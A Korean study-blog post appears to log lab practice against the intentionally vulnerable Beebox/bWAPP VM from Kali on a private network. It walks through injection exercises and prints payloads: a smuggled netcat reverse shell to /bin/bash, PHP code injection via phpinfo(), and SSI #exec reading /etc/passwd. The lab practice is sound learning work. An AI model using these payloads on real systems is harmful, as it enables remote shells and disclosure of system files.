[9월 24일] Beebox: A1 (HTML Injection ~)

linux - ubuntu - beebox 디스크 지정 후 설치

 

Beebox

보안 취약점 실습을 위해 의도적으로 취약하게 만들어진 가상 운영체제

 

SQL 인젝션, XSS, 파일 업로드 등 다양한 웹 취약점들이 미리 포함된 bWAPP이라는 애플리케이션이 설치되어 있어, 공격과 방어 방법을 직접 연습할 수 있다.

 

ifconfig로 IP 확인

 

키보드가 이상하게 입력되는경우 keyboard - Layout 에서 USA 추가 후 Defualt로 지정하기

 

 

 

 

bWAPP v2.2 bug Hack Practice

 

Beebox : 192.168.16.30

Kali : 192.168.16.97 에서 진행

---

A1 - Injection

 

1. HTML Injection - Reflected (GET)

 

 

---

2. HTML Injection - Reflected (POST)

 

 

---

3. HTML Injection - Reflected (Current URL)

 

 

 

 

 

---

4. HTML Injection - Stored (Blog)

 

---

5. IFrame Injection

---

6. LDAP Injection(Search)

---

7. Mail Header Injection(SMTP)

 

 

---

8. OS Command Injection

세미콜론 입력 후 cat 명령어

---

9. OS Command Injection - Blind

 

 

3333번 포트 리스닝

192.168.16.97;nc -vn 192.168.16.97 3333 -e /bin/bash

접속 완료 및 취약점 확인

---

10. PHP Code Injection

 

 

# 파라미터 추가
?message=test;phpinfo();

phpinfo()가 실행되는것을 확인

---

11. Server-Side Includes (SSI) Injection

 

 

 

 

 

 

 

 

---

 

SSI 지시자의 정의

 

 Server Side Includes의 약자로, 서버 측에서 HTML 파일을 사용자에게 보내기 전에 동적으로 내용을 추가하거나 변경할 수 있게 해주는 웹 기술입니다.

 

주요 SSI 지시자 종류

• #include: 다른 파일의 내용을 현재 페이지에 포함시키는 지시자입니다. 웹사이트의 모든 페이지에 동일한 헤더나 푸터를 반복해서 넣을 때 가장 많이 사용됩니다.
• #echo: 서버 환경 변수나 설정된 변수의 값을 화면에 출력하는 지시자입니다. 현재 날짜나 접속자의 IP 주소 같은 정보를 보여줄 때 유용합니다.
• #set: 새로운 변수를 정의하거나 기존 변수에 값을 할당합니다.
• #if...#elif...#else...#endif: 조건에 따라 다른 내용을 보여줄 때 사용되는 조건문입니다. 특정 조건이 참일 경우에만 코드를 실행합니다.
• #exec: 서버에서 외부 명령어 또는 스크립트를 실행하고 그 결과를 페이지에 포함합니다. 보안상의 이유로 대부분의 서버에서는 이 기능이 제한되거나 비활성화되어 있습니다.

---

 

 

<!--#exec cmd="ls"-->

ssi 지시자로 ls 실행

 

 

 

 

ls 명령어가 실행된 것을 확인

 

<!--#exec cmd="cat /etc/passwd"-->

 

 

---

 

ssi 지시자로 cat /etc/passwd 실행

/etc/passwd를 볼수있는것을 확인